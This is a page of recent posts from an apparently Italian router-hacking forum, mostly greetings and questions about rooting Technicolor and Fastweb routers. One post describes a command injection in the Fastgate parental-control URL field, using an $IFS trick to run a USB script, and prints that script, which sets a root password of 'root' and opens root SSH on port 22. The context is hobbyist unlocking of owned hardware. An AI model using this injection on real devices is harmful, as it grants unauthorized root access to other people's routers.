Post recenti

Pagine: [1] 2 3 ... 10
1
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Ciao
« Ultimo post da jojo1234 il Ieri alle 18:49 »
Ciao a tutti
2
Grazie.

Io lavoro proprio in Fastweb ed ero curioso, ma a quanto pare non vale neppure la pena farci un CFW.
3
Ciao, una guida non credo sia ancora stata scritta, io ho il FGA221D che condivide il firmware del DGA4135FWB e almeno fino alla versione 22.2.0378_FW_055_FGA221D la GUI fastweb è vulnerabile in uno dei campi compilabili (Mi pare fosse la stessa trovata ai tempi sul ZXHN H388Q)
Potrei aver trovato qualcosa di interessante, ma non so come sfruttare la falla, sul parental control inserendo come url
Codice: [Seleziona]
;reboot il fastgate si riavvia, quindi penso che quel campo sia iniettabile... Ma essendo il formato originale di un link non accetta stringhe con spazi, sono riuscito solo a riavviarlo... Ho pensato di fargli eseguire uno script da chiavetta, ma non riesco a farlo senza usare spazi
e quindi con il comando
Codice: [Seleziona]
;sh${IFS}/tmp/run/mountd/sda1/sblocco.sh e possibile eseguire un file "sblocco.sh" da una chiavetta USB.
Ho creato un file sblocco con questo contenuto:
Codice: [Seleziona]
#!/bin/sh


echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci set dropbear.global.enable=‘1’
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart

che permette di abilitare l'accesso con username root e password root tramite SSH nella porta 22.

Attenzione, la base del firmware technicolor di questi dispositivi è 22.2 e la GUI Ansuel non è testata per funzionare su questo firmware.
Inoltre queste nuove versioni firmware sono diverse da quelle che conosciamo in RBI, sia per la struttura (I firmware sono adesso in pkgtb) sia come bootloader (Vedi https://hack-technicolor.readthedocs.io/en/latest/Resources/#devices-with-u-boot-bootloader). Io non ho approfondito e non ho abbastanza conoscenze su queste tipologie di firmware
4
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Re:Ciao a tutti
« Ultimo post da natalinux il 13 Maggio 2025, 14:52 »
ciao Morphino
5
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Ciao a tutti
« Ultimo post da Morphino il 13 Maggio 2025, 12:10 »
ciao sono Morphino e sono un grande appassionato di elettronica e informatica. i contenuti del forum sono sempre molto interessanti. grazie e buona giornata a tutti
6
Connessioni ADSL/VDSL/FTTC / Root + Custom Firmware Nexxt One dga4135fwb2
« Ultimo post da Combine il 13 Maggio 2025, 10:35 »
Buongiorno,

C'è una guida per lo sblocco root e custom firmware del modello nexxt one dga4135fwb2?

Io diversi anni fa scrissi una guida simile riguardo il Tim Hub.

Ho guardato un po' i topic in giro, c'è sempre il mitico Ansuel con le sue GUI ma non so se ci sia questo modello esatto:



Un saluto
8
Buongiorno a tutti,
ho letto in altro forum che un utente è riuscito a configurare il DGA 4132 come repeater wifi con delay attraverso luci gui. Tuttavia la discussione è molto vecchia e non mi è stato possibile prendere contatti con l'utente.
Seguendo la guida apposita di OPENWRT, sperimentata su vari router (esiste un video su YT per un TP LINK) mi sono bloccato alla fase di scansione delle reti e da quanto ho capito, attraverso LUCI GUI con versione OPENWRT 18 installata , i driver dei moduli radio non sono installati correttamente (infatti mi compare "generic") e la funzione SCAN non funziona.
Tuttavia attraverso ANSUEL GUI 9.7.7 su firmware 2.4.5 e damson 19.4 il wifi funziona correttamente sulle due radio 2.4GHz e 5GHz (anche la funzione di scan è attiva e rileva le reti circostanti).
Come posso superare questo problema?
C'è modo di installare manualmente i driver  per chipset BROADCOM 63138  per il wifi sotto luci ? Di fatto dovrebbero essere già presenti visto che con altra gui funzionano!
Grazie.
9
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Re:Salve a tutti
« Ultimo post da natalinux il 06 Maggio 2025, 16:30 »
ciao effexor32mg
10
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Re:Ciao a tutti!
« Ultimo post da natalinux il 06 Maggio 2025, 16:29 »
ciao Mekkah
Pagine: [1] 2 3 ... 10